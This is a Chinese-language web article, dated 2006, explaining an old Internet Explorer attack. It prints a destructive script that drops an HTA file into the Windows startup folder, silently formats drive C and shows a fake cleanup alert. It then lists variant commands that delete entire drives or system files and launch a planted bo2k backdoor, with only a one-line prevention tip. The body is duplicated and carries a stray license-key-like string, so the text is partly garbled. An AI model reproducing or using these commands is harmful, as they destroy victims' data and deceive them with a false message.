如何利用HTML格式化你的硬盤
更新時間:2006年09月08日 00:00:00 作者:
這是利用微軟( Microsoft )的IE瀏覽器( Internet Explorer )所衍生出來的
攻擊方法。
以下這段就是具有破壞性的HTML
Hacking Your Computer .
scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人應該就看得出來其中精隨)
現(xiàn)在我大概來解釋其中幾個項目所寫的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"
這一項就是指當你看到這網(wǎng)頁它會寫入到你的電腦啟動目錄底下,并命名為
hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會先問你是否要執(zhí)行,但其中的"/autotest"這項。
它是一個微軟沒有公開的功能,鍵入後format的動作便會被強制執(zhí)行。
這項中的/q /u是令系統(tǒng)不需要檢查硬碟便會立即執(zhí)行的指令。
最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執(zhí)行的時候處於最小
化的狀態(tài)。
執(zhí)行其他攻擊指令的方法∶
只要修改“start.exe /m format c:/q /autotest /u”這一項便形。
start.exe /m format c:/q /autotest /u
其中的“c:”可以換做其他的硬碟。
(path)\bo2k.exe
執(zhí)行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對方c:\windows\system\目錄底下的所有檔案。
後敘∶
預防遭此手段的破壞就是到微軟去更新你的瀏覽器。
cplic putlic eval 01Oct2001 ao9McpUFF-LvJU5BvTp-7xDVpSa4X-RrrcKpv jjCPSUITE-EVAL-3DES-NG CK-CP
攻擊方法。
以下這段就是具有破壞性的HTML
Hacking Your Computer .
scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人應該就看得出來其中精隨)
現(xiàn)在我大概來解釋其中幾個項目所寫的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"
這一項就是指當你看到這網(wǎng)頁它會寫入到你的電腦啟動目錄底下,并命名為
hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會先問你是否要執(zhí)行,但其中的"/autotest"這項。
它是一個微軟沒有公開的功能,鍵入後format的動作便會被強制執(zhí)行。
這項中的/q /u是令系統(tǒng)不需要檢查硬碟便會立即執(zhí)行的指令。
最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執(zhí)行的時候處於最小
化的狀態(tài)。
執(zhí)行其他攻擊指令的方法∶
只要修改“start.exe /m format c:/q /autotest /u”這一項便形。
start.exe /m format c:/q /autotest /u
其中的“c:”可以換做其他的硬碟。
(path)\bo2k.exe
執(zhí)行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對方c:\windows\system\目錄底下的所有檔案。
後敘∶
預防遭此手段的破壞就是到微軟去更新你的瀏覽器。
cplic putlic eval 01Oct2001 ao9McpUFF-LvJU5BvTp-7xDVpSa4X-RrrcKpv jjCPSUITE-EVAL-3DES-NG CK-CP